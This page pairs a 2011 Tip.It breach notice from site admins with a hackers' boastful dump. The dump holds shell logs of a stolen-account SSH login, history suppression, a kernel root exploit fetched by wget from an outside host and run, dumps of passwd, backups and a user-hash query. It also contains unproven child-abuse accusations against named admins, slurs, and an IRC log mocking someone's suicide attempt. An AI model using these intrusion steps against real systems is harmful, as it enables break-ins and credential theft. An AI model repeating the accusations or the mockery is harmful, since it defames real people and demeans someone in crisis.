Hello Folks,
As you know, Tip.It and Forum.Tip.It have been down most of October 11 and continue to be down. Tip.It's servers were unfortunately hacked and the only way to ensure user security and regain control of our servers was to shut down the servers until we can be completely confident that they are safe again.
As a result, it is likely that segments of our user database were dumped and are now in the hands of other people to use against your RuneScape account or other online accounts. The stolen data may or may not include usernames, password hashes, email addresses, IP addresses and any other information you may have provided on the Tip.It Forums. Please note that your forum password was absolutely NOT stored in plain text - all passwords on our forums are encrypted and will require brute forcing from the hackers in order to render them usable. Regardless, we are assuming the worst and recommending you take action now to ensure your accounts are all secure.
It is highly recommended to ensure that your password and email address used on Tip.It are NOT used ANYWHERE else on the internet, especially on your RuneScape account. If you use the same password and/or email address on your RuneScape account, it is HIGHLY likely that your account will be compromised sooner or later. Don't take the risk - use a UNIQUE password and email address on your RuneScape account to ensure maximum security.
We also highly recommend you beef up the security on your email address. Oftentimes hackers can gain access to your email and wreak havoc by accessing any accounts tied into that particular email. A few tips to ensure email account safety:
- Don't be sloppy on your recoveries - make them as difficult to crack as your password. Random numbers, letters and symbols with mixed cases work beautifully!
- Delete old emails you have no need to keep - the less information stored in your email the better!
- Use two-step verification with your mobile device wherever possible - this is a powerful tool to keep unauthorized people out of your email!
As of now, approximately 0230 GMT on October 12, 2011, and for several hours prior to this, all Tip.It's servers are entirely under the control of the Tip.It administration. Every effort is being made by the administration to restore normal service as soon as possible.
Lastly, all rumours surrounding Tip.It Administrators' involvement in child pornography are entirely FALSE and are exactly that - RUMOURS. No staff members at Tip.It are involved in the creation or distribution of child pornography nor is there pornography of any kind on Tip.It servers. These are simply rumours created to cause controversy in the community - and it has worked. Again, these allegations are ENTIRELY FALSE.
This is all the information available at this point. We will do our best to continue to update the community as much as possible through these difficult times. We appreciate your support during this rough time and we apologize for the inconvenience that this downtime causes to your game play.
Respectfully yours,
Tip.It Administrative Team
~ Raflz - Led-Zeppelin - Sigex3unit ~
heya friends!
So.. the niqaz here trollin' along the tip.it sidewalk when we hear some rumours about a tip.it box seeding childporn.. Immediately this grabs our attention due to the fact we're all huge humanitarians and really care about kids. We start an investigation into this. During our investigation we find out silverion and associates ALSO abuse all types of kids and users into buying their site merchandise and.. They make over 2K USD a day doing so, selling shirts, cups, and what not, including ads. So, we decide that we have to hack tip.it as we start to find growing evidence of such horrible activity and sure enough, after about one week of doing our magic we get in. THERE IN THE /home/ FOLDER.. NEED I EVEN SAY WHAT WE FOUND? WHAT DO YOU THINK? SILVERION IS FUCKING SICK. The only thing to do now is to force-close tip.it. To all the children who may have been approached sexually by silverion or other admins. Please contact the police or go see a shrink as we have some logs of this happening, but will not be posting. Truly a horrible thing to find. Now how about them jagex mods getting hacked? uh oh I think we might be responsible!! 
and just for the lulz...
irc.SwiftIRC.net
* Naffy (~JamesMurr@Swift-D212DF66.lnk.telstra.net) has joined #rsniqazHey narbs <@Raflz> helo <@Raflz> welcome bak 4m da ded <@Raflz> wud u like tip it db <@Raflz> to feast Hey man Do you guys all think im trolling? <@Raflz> LOL <@Raflz> should've hit the car faster bro LOL I really dont need this I'll talk to you guys later Ive been in the psych ward since sunday night <@Raflz> ROFL <@Raflz> do u want <@Raflz> tip.it I just got out <@Raflz> to feast <@Raflz> or not yeah. I would if thats a possibility <@Raflz> i love you man <@Raflz> im not gonna lie i really feel like doing it gave my life direction <@Raflz> lets b butt buddiez I actually learnt something Yeah <@Raflz> like <@Raflz> how to hit a car faster hitting parked cars at 120KM/h hurts eh <@Raflz> lesson: i'll paste the convo I had <@Raflz> if ur gonna suicide right before I hit it with my mate <@Raflz> hit a car faster next time <@Raflz> LOL while i was snorting oxy ok paste it <@Raflz> paste it pls wait up If you can beat me in a game of LoL 1v1 i will give you tip.it me: man if i actually went through with it now would I be a bad person? Would I be selfish? him: Not worth it man Seriously Fucking You're actually intelligent me: but.. itd be over for me This convo suddenly turned really gay k No continue but yeah theres more o me: but there will be others man others like me others with such power. i see everything man, i know im insane but ive seen it for a long time i feel like i can see peoples thoughts I was referring to raflz use of the term 'bluenaffle' in pm him: There's no such thing as insane It's just difficult dealing with what you know Happened to my uncle me: ive got the keys man Im going to think about it on the drive but.. i always enjoyed talking to you. <@Raflz> LOL i'll see you in another life brother im getting the last little pieces before i walk to the car one last cigarette. 
i told you 5 so i'll stick to that <@Raflz> man <@Raflz> why didnt you hit it faster Can you see people naked? <@Raflz> you just suck they wont come to terms with it but they will understand it. i'm hoping my dad left the keys. and if he didnt, they'll be on the kitchen table. whats your number? I'll give you a ring i lost control never really driven before <@Raflz> just <@Raflz> 120km/h rofl ok raflz dont be mean dude, that's pretty fucking fast. naffy is our friend <@Raflz> no it isnt <@Raflz> fuck off didnt feel like it
Oh dem niqqaz, how do dey do it
[root@ldx ~]# ssh tip.it -lbulat
bulat@tip.it's password:
[bulat@web01 root]$ export HISTFILE=/dev/null
[bulat@web01 root]$ uname -a
Linux web01.tip.it 2.6.34.9-69.fc13.x86_64 #1 SMP Tue May 3 09:23:03 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
[bulat@web01 root]$ ./tr1p
Enter b1tch key: ******
[+] Tr1p/SSDTX local root exploit by g4yh1tl3r
[+] Resolved commit_creds to ffffffff8106b909
[+] Resolved prepare_kernel_cred to ffffffff8106b7f1
[+] Us1ng 1dt b1tch br34k
[+] Preparing underflow payload
[+] Mapped ZERO PAGE!
[root@web01 ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@web01 ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:498:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nscd:x:28:497:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:496:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:495:Apache:/var/www:/sbin/nologin
haldaemon:x:68:494:HAL daemon:/:/sbin/nologin
openvpn:x:498:493:OpenVPN:/etc/openvpn:/sbin/nologin
distcache:x:94:492:Distcache:/:/sbin/nologin
saslauth:x:497:491:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:490::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:489::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:496:488:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:487:MySQL Server:/var/lib/mysql:/bin/bash
nm-openconnect:x:495:486:NetworkManager user for OpenConnect:/:/sbin/nologin
webalizer:x:67:485:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dovecot:x:494:483:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
backuppc:x:493:481::/var/lib/BackupPC:/sbin/nologin
torrent:x:492:480:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
bulat:x:500:500::/home/bulat:/bin/bash
wizard:x:501:501::/home/wizard:/bin/bash
eira:x:502:502::/home/eira:/bin/bash
beta:x:503:503::/home/beta:/bin/bash
peter:x:504:504::/home/peter:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
clamupdate:x:491:477:Clamav database update user:/var/lib/clamav:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
ntpd:x:505:505::/home/ntpd:/bin/bash
[root@web01 ~]# cat /etc/shadow
[root@web01 ~]# cd ~bulat
[root@web01 bulat]# cat .bash_history
su -
ls
ls -lt
sftp bulat@forum.tip.it
[root@web01 bulat]# ls -la
total 9683064
drwx------ 6 bulat bulat 4096 Oct 11 07:50 .
drwxr-xr-x. 8 root root 4096 Oct 6 10:49 ..
drwxr-xr-x 3 bulat bulat 4096 Oct 7 01:11 b2
-rw-r--r-- 1 bulat bulat 8918314 Sep 6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r-- 1 root root 7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r-- 1 root root 403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 493592011 Sep 6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r-- 1 root root 4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 399822071 Sep 6 07:58 backup-mysql-full-06092011.tar.gz
drwxr-xr-x 17 bulat bulat 4096 Oct 7 01:10 backups
drwxr-xr-x 14 bulat bulat 4096 Oct 7 01:14 backups-oldwww
-rw-r--r-- 1 bulat bulat 4270006769 Sep 6 08:24 backup-www-full-06092011.tar.gz
-rw-r--r-- 1 bulat bulat 18 May 21 2010 .bash_logout
-rw-r--r-- 1 bulat bulat 176 May 21 2010 .bash_profile
-rw-r--r-- 1 bulat bulat 124 May 21 2010 .bashrc
drwx------ 3 bulat bulat 4096 Oct 9 08:09 .ssh
-rw-r--r-- 1 bulat bulat 658 Mar 22 2010 .zshrc
[root@web01 bulat]# ls -la backup*
-rw-r--r-- 1 bulat bulat 8918314 Sep 6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r-- 1 root root 7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r-- 1 root root 403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 493592011 Sep 6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r-- 1 root root 4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 399822071 Sep 6 07:58 backup-mysql-full-06092011.tar.gz
-rw-r--r-- 1 bulat bulat 4270006769 Sep 6 08:24 backup-www-full-06092011.tar.gz
backups:
total 18520536
drwxr-xr-x 17 bulat bulat 4096 Oct 7 01:10 .
drwx------ 6 bulat bulat 4096 Oct 11 07:50 ..
-rw-r--r-- 1 root root 68802560 May 19 14:18 backup-etc-2011051901.tar
-rw-r--r-- 1 root root 22169600 May 18 18:01 backup-etc-20110519.tar
-rw-r--r-- 1 root root 9019408 May 19 14:18 backup-forum-etc-20091210.tar.gz
-rw-r--r-- 1 root root 403491046 Oct 6 10:52 backup-forum-mysql-26092011.tar.gz
-rw-r--r-- 1 root root 708034560 May 18 19:02 backup-mysql-20110519.tar
-rw-r--r-- 1 root root 48271360 May 8 02:39 backup-mysql-beta-20110507.tar
-rw-r--r-- 1 root root 699760640 May 8 02:41 backup-mysql-full-20110507.tar
-rw-r--r-- 1 root root 699627520 May 8 02:42 backup-mysql-full-20110508.tar
-rw-r--r-- 1 root root 2723840 May 8 02:42 backup-mysql-lotro-20110507.tar
-rw-r--r-- 1 root root 604866560 May 8 02:44 backup-mysql-runescape-20110507.tar
-rw-r--r-- 1 root root 870400 May 7 10:01 backup-w2-arena-20110507.tar
-rw-r--r-- 1 root root 960880640 May 7 10:03 backup-w2-beta-20110507.tar
-rw-r--r-- 1 root root 16844800 May 7 10:03 backup-w2-easygadget-20110507.tar
-rw-r--r-- 1 root root 3998003200 May 7 10:12 backup-w2-html-20110507.tar
-rw-r--r-- 1 root root 11192320 May 7 10:12 backup-w2-lotro-20110507.tar
-rw-r--r-- 1 root root 10240 May 7 10:12 backup-w2-trieste-20110507.tar
-rw-r--r-- 1 root root 1587200 May 7 10:12 backup-w2-war-20110507.tar
-rw-r--r-- 1 root root 5302497280 May 18 19:13 backup-www-20110519.tar
-rw-r--r-- 1 root root 68802560 May 19 14:18 backup-wwwetc-20110519.tar
drwx------ 2 mysql mysql 12288 May 7 18:00 beta
-rw-r--r-- 1 root root 19850900 May 8 02:44 full-w2-mysql-20070828.tgz
-rw-r--r-- 1 root root 17941509 May 8 02:44 full-w2-mysql-20080608.tgz
-rw-r--r-- 1 root root 5245419520 May 7 10:24 full-w2-www-20110507.tar
drwx------ 2 mysql mysql 4096 Jul 2 2007 lotro
drwx------ 2 mysql mysql 4096 Mar 4 2007 MD_Stats
drwx------ 2 mysql mysql 4096 Nov 24 2006 mysql
-rw-r--r-- 1 root root 19374500 May 8 02:44 mysql-20080827.tar.gz
drwx------ 2 mysql mysql 4096 Dec 18 2003 mysql-old
-rw-r--r-- 1 root root 16208748 May 8 02:44 mysql.tar.gz-OLD
drwx------ 2 mysql mysql 4096 Nov 24 2006 phpmyadmin
drwx------ 2 mysql mysql 4096 May 8 00:51 PhpStats019
drwx------ 2 mysql mysql 4096 Jul 11 2008 rewrite
drwx------ 2 mysql mysql 12288 Oct 7 01:11 runescape
drwx------ 2 mysql mysql 4096 Jan 30 2008 runescape_copy
drwx------ 2 mysql mysql 4096 Sep 15 2007 silks
drwx------ 2 mysql mysql 4096 Jul 30 2007 volantini
drwx------ 2 mysql mysql 4096 Oct 2 2008 war
drwxr-xr-x 15 mysql mysql 4096 May 19 13:38 wwwsql
drwx------ 2 mysql mysql 4096 Apr 14 02:34 zenit
backups-oldwww:
total 9586804
drwxr-xr-x 14 bulat bulat 4096 Oct 7 01:14 .
drwx------ 6 bulat bulat 4096 Oct 11 07:50 ..
-rw-r--r-- 1 root root 9009631 May 21 12:54 backup-etc-2011051901.tar.gz
-rw-r--r-- 1 root root 9019408 May 21 12:54 backup-forum-etc-20091210.tar.gz
-rw-r--r-- 1 root root 435602073 May 21 12:55 backup-forum-html-20091210.tar.gz
-rw-r--r-- 1 root root 1222295 May 21 12:55 backup-forum-teamspeak-20091210.tar.gz
-rw-r--r-- 1 root root 201001674 May 21 12:59 backup-mysql-20110519.tar.gz
-rw-r--r-- 1 root root 13800344 May 21 13:00 backup-mysql-beta-20110507.tar.gz
-rw-r--r-- 1 root root 197321301 May 21 13:05 backup-mysql-full-20110507.tar.gz
-rw-r--r-- 1 root root 197287223 May 21 13:11 backup-mysql-full-20110508.tar.gz
-rw-r--r-- 1 root root 764740 May 21 13:11 backup-mysql-lotro-20110507.tar.gz
-rw-r--r-- 1 root root 172928002 May 21 13:16 backup-mysql-runescape-20110507.tar.gz
-rw-r--r-- 1 root root 298212 May 21 13:16 backup-w2-arena-20110507.tar.gz
-rw-r--r-- 1 root root 575464655 May 21 13:21 backup-w2-beta-20110507.tar.gz
-rw-r--r-- 1 root root 11999273 May 21 13:22 backup-w2-easygadget-20110507.tar.gz
-rw-r--r-- 1 root root 1682773384 May 21 13:45 backup-w2-html-20110507.tar.gz
-rw-r--r-- 1 root root 8756867 May 21 13:45 backup-w2-lotro-20110507.tar.gz
-rw-r--r-- 1 root root 1035 May 21 13:45 backup-w2-trieste-20110507.tar.gz
-rw-r--r-- 1 root root 824683 May 21 13:45 backup-w2-war-20110507.tar.gz
-rw-r--r-- 1 root root 2413773014 May 21 14:17 backup-www-20110519.tar.gz
-rw-r--r-- 1 root root 9009490 May 21 14:17 backup-wwwetc-20110519.tar.gz
drwx------ 2 mysql mysql 4096 Aug 15 2008 beta
-rw-r--r-- 1 root root 8485310 May 21 14:17 full-db-backup-03-25-07.tar.gz
-rw-r--r-- 1 root root 6820368 May 21 14:17 full-db-backup-12-14-06.tar.gz
-rw-r--r-- 1 root root 30778399 May 21 14:18 full-db-backup-2010-04-25.1.tar.gz
-rw-r--r-- 1 root root 30778779 May 21 14:18 full-db-backup-2010-04-25.tar.gz
-rw-r--r-- 1 root root 19850900 May 21 14:18 full-w2-mysql-20070828.tgz
-rw-r--r-- 1 root root 17941509 May 21 14:19 full-w2-mysql-20080608.tgz
-rw-r--r-- 1 root root 586278595 May 21 14:21 full-w2-www-20070828.tgz
-rw-r--r-- 1 root root 2389188411 May 21 14:47 full-w2-www-20110507.tar.gz
drwx------ 2 mysql mysql 4096 Jul 2 2007 lotro
drwx------ 16 mysql mysql 4096 Nov 24 2006 mysql
-rw-r--r-- 1 root root 19374500 May 21 14:47 mysql-20080827.tar.gz
-rw-r--r-- 1 root root 16208748 May 21 14:47 mysql.tar.gz-OLD
drwx------ 2 mysql mysql 4096 Nov 24 2006 phpmyadmin
drwx------ 2 mysql mysql 4096 Aug 27 2008 PhpStats019
drwx------ 2 mysql mysql 4096 Jul 11 2008 rewrite
drwx------ 2 mysql mysql 4096 Aug 16 2008 runescape
drwx------ 2 mysql mysql 4096 Jan 30 2008 runescape_copy
drwxr-xr-x 3 root root 4096 Oct 6 11:09 var
drwx------ 2 mysql mysql 4096 Jul 30 2007 volantini
drwx------ 2 mysql mysql 4096 Sep 16 2007 war
-rw-r--r-- 1 root root 740444414 May 21 14:51 www.tar.gz-OLD
drwx------ 2 mysql mysql 4096 Jun 18 2008 zenit
[root@web01 bulat]# cd /var/www/html
[root@web01 html]# ls -la
total 711004
drwxr-xr-x 20 root root 4096 Oct 11 07:45 .
drwxr-xr-x 21 root root 4096 Jun 28 09:06 ..
drwxrwxr-x 13 root apache 4096 Sep 24 16:25 adds
-rw-rw-r-- 1 eira eira 499 Dec 20 2003 back.JPG
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal2.html
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal.html
drwxr-xr-x 3 eira eira 4096 Jan 16 2007 common
drwxr-xr-x 3 eira eira 4096 Feb 8 2005 daoc
drwxr-xr-x 4 eira eira 4096 Jul 10 2008 eira
drwxr-xr-x 7 eira eira 4096 Aug 19 2008 error_404
-rw-r--r-- 1 eira eira 2274 Dec 21 2003 favicon.ico
drwxr-xr-x 3 root root 4096 Aug 20 2008 gladiatus
-rw-r--r-- 1 root root 0 Dec 25 2006 google13ce76cda5634bd5.html
drwxr-xr-x 4 eira eira 4096 Jan 30 2006 img
-rw-rw-r-- 1 eira eira 1507 Jun 22 2004 index.html
-rw-r--r-- 1 root root 14553577 Oct 11 07:51 phpbb_users.txt
-rw-r--r-- 1 root root 16 Mar 25 2005 phpinfo_x.php
-rw-r--r-- 1 root root 0 Sep 21 2007 robots.txt
-rw-r--r-- 1 root root 1548 Jan 16 2007 robots.txt-old
drwxrwxr-x 13 eira apache 4096 Oct 3 2010 rsc
drwxrwxr-x 31 eira apache 4096 Oct 7 00:59 runescape
drwxr-xr-x 9 root root 4096 Sep 24 2007 silks
-rw-rw-r-- 1 eira eira 15698 Dec 20 2003 Silverion.jpg
-rw-r--r-- 1 root root 141686 Jun 6 2007 sitemap2.xml
-rw-r--r-- 1 root root 15276 Jun 6 2007 sitemap.xml
drwxr-xr-x 2 root root 4096 Mar 28 2005 stats
-rw-rw-r-- 1 eira eira 34462 Jun 22 2004 tipitlayout1c.jpg
drwxr-xr-x 2 webalizer root 4096 Jul 1 2005 usage
drwxr-xr-x 5 eira eira 4096 Sep 26 06:27 vela
-rw-r--r-- 1 root root 114052870 Jun 24 01:41 vela.tar.gz
drwxr-xr-x 3 eira eira 4096 Aug 9 2007 vocegiuliana
drwxr-xr-x 2 eira eira 4096 Aug 9 2007 volantini
drwxr-xr-x 3 eira eira 4096 Jun 9 2008 wizard
-rw-r--r-- 1 root root 127 Jan 15 2007 y_key_56098cca870c821d.html
drwxr-xr-x 2 root root 4096 Jun 24 09:34 zenit
drwxr-xr-x 10 eira eira 4096 Jun 24 01:08 zenit-with-holes
-rw-r--r-- 1 root root 598370689 Jun 24 01:44 zenit.zip
[root@web01 html]# cd adds
[root@web01 adds]# ls -al
total 208
drwxrwxr-x 13 root apache 4096 Sep 24 16:25 .
drwxr-xr-x 20 root root 4096 Oct 11 07:45 ..
-rw-rw-r-- 1 root apache 2308 Apr 29 2006 activation.old.php
-rw-rw-r-- 1 peter peter 2846 Sep 14 2008 activation.php
drwxrwxr-x 2 root apache 4096 Apr 17 21:03 areas
drwxrwxr-x 2 root apache 4096 Jun 15 2008 backup
-rw-rw-r-- 1 root apache 580 Apr 25 2006 backup.php
-rw-rw-r-- 1 root apache 1002 Jan 4 2007 comparereqs.php
-rw-rw-r-- 1 peter peter 15124 Jul 21 2008 contactsubmits.php
-rw-rw-r-- 1 peter peter 473 Jul 21 2008 contactuspopup.php
-rw-rw-r-- 1 peter peter 961 Jul 23 2008 download.php
drwxrwxrwx 6 root apache 4096 Dec 20 2009 files
drwxrwxr-x 3 root apache 4096 Oct 3 2010 functions
drwxrwxr-x 2 root apache 4096 Jun 15 2008 handlers
-rw-rw-r-- 1 peter peter 421 Sep 14 2008 hosttest.php
drwxrwxr-x 2 root apache 4096 Sep 14 2008 includes
-rw-rw-r-- 1 root apache 25247 May 20 14:34 index.php
-rw-rw-r-- 1 root apache 130 Sep 24 16:50 info.php
-rw-rw-r-- 1 peter peter 12110 Jun 12 14:59 itempopup_search.php
drwxrwxr-x 4 peter peter 4096 Jun 12 14:58 js
-rw-rw-r-- 1 root apache 397 Apr 25 2006 keepalive.php
-rw-rw-r-- 1 root apache 4454 Apr 28 2006 login.old.php
-rw-rw-r-- 1 peter peter 10348 Jan 26 2011 login.php
drwxrwxr-x 8 root apache 4096 Jun 15 2008 map_team
-rw-rw-r-- 1 root apache 2270 May 30 2006 previewtimes.php
drwxrwxr-x 5 root apache 4096 Apr 2 2011 styles
drwxrwxr-x 2 root apache 4096 Jun 15 2008 tmp
drwxrwxr-x 2 root apache 4096 Sep 24 16:50 transfer
-rw-rw-r-- 1 root apache 533 Apr 25 2006 userguide_coders.php
-rw-rw-r-- 1 root apache 28370 Jul 16 2009 userguide.php
-rw-rw-r-- 1 root apache 4889 Apr 25 2006 userguidepopup.php
[root@web01 adds]# head -n010 login.php
*------------------------------------------------------------------------------
*/
session_start();
[root@web01 adds]# head -n100 login.php
*------------------------------------------------------------------------------
*/
session_start();
//include stuff
include('functions/db_connect_guides.php');
require_once('functions/admin.php');
ini_set('error_reporting', E_ALL);
function prepareinput($array)
{
foreach($array as $key => $value)
{
if (!is_array($array[$key]))
{
$value = stripslashes($value);
$value = mysql_real_escape_string($value);
$array[$key] = $value;
}
}
return $array;
}
prepareinput($_POST);
function login($msg, $disable, $user)
{
$disabled = '';
if($disable == 'true')
{
$disabled = ' disabled';
}
print '
Restricted Area :: '.$msg.'
';
}
if(!isset($_SESSION['count']))
{
$_SESSION['count'] = 0;
}
if ($_SESSION['count'] > 3)
{
login('Too many incorrect logins', 'true');
exit();
}
if(isset($_GET['logout']))
{
if(isset($_COOKIE['session_info']) || isset($_COOKIE['session_info_id']))
{
setcookie("session_info", "", time()-60*60*24*100, "/");
setcookie("session_info_id", "", time()-60*60*24*100, "/");
}
if(isset($_SESSION['session_info']))
{
[root@web01 adds]# cat functions/db_connect_guides.php
[root@web01 adds]# cd ..
[root@web01 html]# ls -al
total 716824
drwxr-xr-x 20 root root 4096 Oct 11 07:45 .
drwxr-xr-x 21 root root 4096 Jun 28 09:06 ..
drwxrwxr-x 13 root apache 4096 Oct 11 07:53 adds
-rw-rw-r-- 1 eira eira 499 Dec 20 2003 back.JPG
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal2.html
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal.html
drwxr-xr-x 3 eira eira 4096 Jan 16 2007 common
drwxr-xr-x 3 eira eira 4096 Feb 8 2005 daoc
drwxr-xr-x 4 eira eira 4096 Jul 10 2008 eira
drwxr-xr-x 7 eira eira 4096 Aug 19 2008 error_404
-rw-r--r-- 1 eira eira 2274 Dec 21 2003 favicon.ico
drwxr-xr-x 3 root root 4096 Aug 20 2008 gladiatus
-rw-r--r-- 1 root root 0 Dec 25 2006 google13ce76cda5634bd5.html
drwxr-xr-x 4 eira eira 4096 Jan 30 2006 img
-rw-rw-r-- 1 eira eira 1507 Jun 22 2004 index.html
-rw-r--r-- 1 root root 20509161 Oct 11 07:54 phpbb_users.txt
-rw-r--r-- 1 root root 16 Mar 25 2005 phpinfo_x.php
-rw-r--r-- 1 root root 0 Sep 21 2007 robots.txt
-rw-r--r-- 1 root root 1548 Jan 16 2007 robots.txt-old
drwxrwxr-x 13 eira apache 4096 Oct 3 2010 rsc
drwxrwxr-x 31 eira apache 4096 Oct 7 00:59 runescape
drwxr-xr-x 9 root root 4096 Sep 24 2007 silks
-rw-rw-r-- 1 eira eira 15698 Dec 20 2003 Silverion.jpg
-rw-r--r-- 1 root root 141686 Jun 6 2007 sitemap2.xml
-rw-r--r-- 1 root root 15276 Jun 6 2007 sitemap.xml
drwxr-xr-x 2 root root 4096 Mar 28 2005 stats
-rw-rw-r-- 1 eira eira 34462 Jun 22 2004 tipitlayout1c.jpg
drwxr-xr-x 2 webalizer root 4096 Jul 1 2005 usage
drwxr-xr-x 5 eira eira 4096 Sep 26 06:27 vela
-rw-r--r-- 1 root root 114052870 Jun 24 01:41 vela.tar.gz
drwxr-xr-x 3 eira eira 4096 Aug 9 2007 vocegiuliana
drwxr-xr-x 2 eira eira 4096 Aug 9 2007 volantini
drwxr-xr-x 3 eira eira 4096 Jun 9 2008 wizard
-rw-r--r-- 1 root root 127 Jan 15 2007 y_key_56098cca870c821d.html
drwxr-xr-x 2 root root 4096 Jun 24 09:34 zenit
drwxr-xr-x 10 eira eira 4096 Jun 24 01:08 zenit-with-holes
-rw-r--r-- 1 root root 598370689 Jun 24 01:44 zenit.zip
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| lotro |
| runescape |
| war |
+--------------------+
4 rows in set (0.00 sec)
mysql> show tables;
+---------------------------+
| Tables_in_runescape |
+---------------------------+
| adds_approvals |
| adds_auth |
| adds_categories |
| adds_images |
| adds_ip |
| adds_log |
| adds_sessions |
| adds_uploads |
| adds_users |
| members |
| rs2_atlas |
| rs2_calculators |
| rs2_calculators_arrays |
| rs2_citadel |
| rs2_citadel_slot |
| rs2_clanlist |
| rs2_clans_news |
| rs2_clans_pages |
| rs2_construction |
| rs2_contactus |
| rs2_diversion_locations |
| rs2_diversion_pair |
| rs2_diversion_week |
| rs2_dynamic_approve |
| rs2_dynamic_bans |
| rs2_dynamic_log |
| rs2_dynamic_statcache |
| rs2_events |
| rs2_events_comments |
| rs2_events_scores |
| rs2_events_scores_players |
| rs2_events_scores_year |
| rs2_events_teams |
| rs2_featured |
| rs2_gecache |
| rs2_genames |
| rs2_gerecords |
| rs2_getimes |
| rs2_guides |
| rs2_hitscheck |
| rs2_microhelper |
| rs2_monster |
| rs2_monster_attacks |
| rs2_monster_groups |
| rs2_monster_items |
| rs2_monster_reports |
| rs2_news |
| rs2_pages |
| rs2_poll |
| rs2_poll2 |
| rs2_poll2_answers |
| rs2_poll2_votes |
| rs2_poll_results |
| rs2_poll_votes |
| rs2_quest |
| rs2_quest_draft |
| rs2_quest_pages |
| rs2_quest_reports |
| rs2_quest_req |
| rs2_races |
| rs2_report_ban |
| rs2_report_flood |
| rs2_subquests |
| rs2_summon |
| rs2_times |
| rs2_times_dategroups |
| rs2item |
| rs2item_categories |
| rs2item_group_items |
| rs2item_groups |
| rs2item_reports |
| rs2item_stats |
| rs2item_subcat |
| rs2shops |
| rs2shops_city |
| rs2shops_currency |
| rs2shops_kingdom |
| rs2shops_report |
| rs2shops_reportstock |
| rs2shops_stock |
| rs2shops_type |
| rsc_bestiary |
| staff_position |
| staff_users |
+---------------------------+
84 rows in set (0.00 sec)
mysql> select concat_ws(0x3a,user_name,password,salt) from adds_users;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 11415326
Current database: runescape
+----------------------------------------------------------+
| concat_ws(0x3a,user_name,password,salt) |
+----------------------------------------------------------+
+----------------------------------------------------------+
And now...just for lulz, we sniffed da root passwordz
[root@web01 bulat]# cat /root/.bdlogs
^That makes one box, NOW FOR DA NEXT!@#$#$%^&&**((@(@(@))))@)@)@)@)#)#)#)#)#)#)##)#)#)#)#)#)#)#)#)#0
[bulat@forumx ~]$
[bulat@forumx ~]$ wget niqqaz.rs/0dayhidden -O tr1p >> /dev/null
[bulat@forumx ~]$ ./tr1p
Enter b1tch key: ***************
[+] Tr1p/SSDTX local root exploit by g4yh1tl3r
[+] Resolved commit_creds to ffffffff81062417
[+] Resolved prepare_kernel_cred to ffffffff810622f8
[+] Us1ng 1dt b1tch br34k
[+] Preparing underflow payload
[+] Mapped ZERO PAGE!
[root@forumx ~]# export HISTFILE=/dev/null
[root@forumx ~]# uname -a; id
Linux forumx.tip.it 2.6.30.10-105.2.23.fc11.x86_64 #1 SMP Thu Feb 11 07:06:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@forumx ~]# last -a |less
root tty1 Tue Oct 11 07:42 gone - no logout
reboot system boot Tue Oct 11 07:23 (00:45) 2.6.30.10-105.2.23.fc11.x86_64
